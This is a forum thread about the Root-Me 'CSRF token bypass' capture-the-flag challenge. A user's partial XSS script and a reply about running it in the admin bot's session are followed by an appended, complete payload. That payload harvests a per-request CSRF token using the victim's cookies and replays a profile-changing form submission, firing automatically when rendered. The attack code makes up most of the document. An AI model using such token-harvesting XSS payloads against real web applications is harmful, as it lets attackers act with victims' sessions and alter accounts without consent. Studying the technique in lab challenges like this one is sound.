Sunday 25 March 2018, 16:56  #1
Web - Client | CSRF token bypass
KPOT
  • 1 posts

Hello, guys. I have a problem with that task. The script works great, but nothing changed when the bot got a message with the payload.
I was trying to exploit it using XSS on the 'search' page.

script.js
============================

var csrfProtectedPage = 'http://challenge01.root-me.org/web-client/ch23/?action=profile';
var csrfProtectedForm = 'profile';

// get valid token for current request (same-origin request, so the session
// cookies of whoever runs this script are sent and the token is theirs)
var html = get(csrfProtectedPage);
document.body.innerHTML = html;
var form = document.getElementById(csrfProtectedForm);
var token = form.token.value;

// build form with valid token
...

// submit form
document.getElementById("profile").submit();

// synchronous GET so the token is available before the form is built
function get(url) {
    var xmlHttp = new XMLHttpRequest();
    xmlHttp.open("GET", url, false);
    xmlHttp.send(null);
    return xmlHttp.responseText;
}

============================

Wednesday 26 December 2018, 16:35  #2
Web - Client | CSRF token bypass
MathiasC
  • 2 posts

If you use it on the search page, it will not be the admin validating your account but you trying to validate yourself. I am stuck on this challenge as well, but I think you have to work around the contact form.
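As an added example (not code from either post above), here is the complete token-harvesting payload the thread is circling around: a script that, once it executes in the admin bot's browser, fetches the CSRF-protected page with the bot's own cookies, reads the per-request token out of the HTML, and replays the form with it. This is why a session-bound token does not stop the attack once there is an XSS on the same origin; the only thing that matters is whose session runs the script, which is the point of post #2. Only the URL `?action=profile`, the form id `profile` and the field name `token` come from the thread; the other field names (`username`, `status`) and the value `status=on` are assumptions, and the sample HTML at the bottom is constructed so the extractor can be checked offline without a DOM.

```javascript
// Added example, not from the original thread. Stored-XSS payload that
// harvests a per-request CSRF token and replays it from the victim's session.
//
// Assumptions (not confirmed by the thread): the profile form posts fields
// `username`, `status` and `token`, and the attacker wants status=on. Only
// `?action=profile`, the form id `profile` and the `token` field are from post #1.

const CSRF_PROTECTED_PAGE = 'http://challenge01.root-me.org/web-client/ch23/?action=profile';

// Pull the hidden token out of the page source without relying on DOM APIs, so
// the same helper works inside the browser payload and in a plain Node test.
// Handles name-before-value and value-before-name, double or single quotes.
function extractToken(html) {
  const inputRe = /<input\b[^>]*>/gi;
  let m;
  while ((m = inputRe.exec(html)) !== null) {
    const tag = m[0];
    const name = /\bname\s*=\s*["']?([^"'\s>]+)/i.exec(tag);
    if (!name || name[1] !== 'token') continue;
    const value = /\bvalue\s*=\s*["']?([^"'\s>]*)/i.exec(tag);
    return value ? value[1] : null;
  }
  return null;
}

// Build an application/x-www-form-urlencoded body from a field map.
function buildFormBody(fields) {
  return Object.entries(fields)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join('&');
}

// Browser part: fetch the protected page with the victim's cookies (same
// origin, credentials included), harvest the token, then replay the form.
// Returns the HTTP status of the replayed POST.
async function harvestAndReplay(fields) {
  const page = await fetch(CSRF_PROTECTED_PAGE, { credentials: 'include' });
  const token = extractToken(await page.text());
  if (!token) throw new Error('no CSRF token found in profile page');
  const res = await fetch(CSRF_PROTECTED_PAGE, {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildFormBody({ ...fields, token }),
  });
  return res.status;
}

// Only fire when a DOM is present, i.e. when the payload actually runs in the
// admin bot's browser after being delivered through the contact form.
if (typeof document !== 'undefined') {
  // Field names are assumptions; adjust to the real form before use.
  harvestAndReplay({ username: 'KPOT', status: 'on' }).catch(() => {});
}

// Constructed sample page (not a real server response) for offline checks of
// the extractor: attribute order and quoting deliberately vary.
const SAMPLE_PROFILE_HTML = `
<form id="profile" method="post" action="?action=profile">
  <input type="text" name="username" value="KPOT">
  <input value="1" type="checkbox" name="status">
  <input type="hidden" value="a1b2c3d4e5f6" name="token">
  <input type="submit" value="Submit">
</form>`;
```

Delivered through a field the admin bot renders (the contact form, as post #2 suggests), the `fetch` calls carry the bot's cookies, so the token read back is the bot's and the POST is accepted as the bot's action; run from your own search page, the same script only acts on your own account.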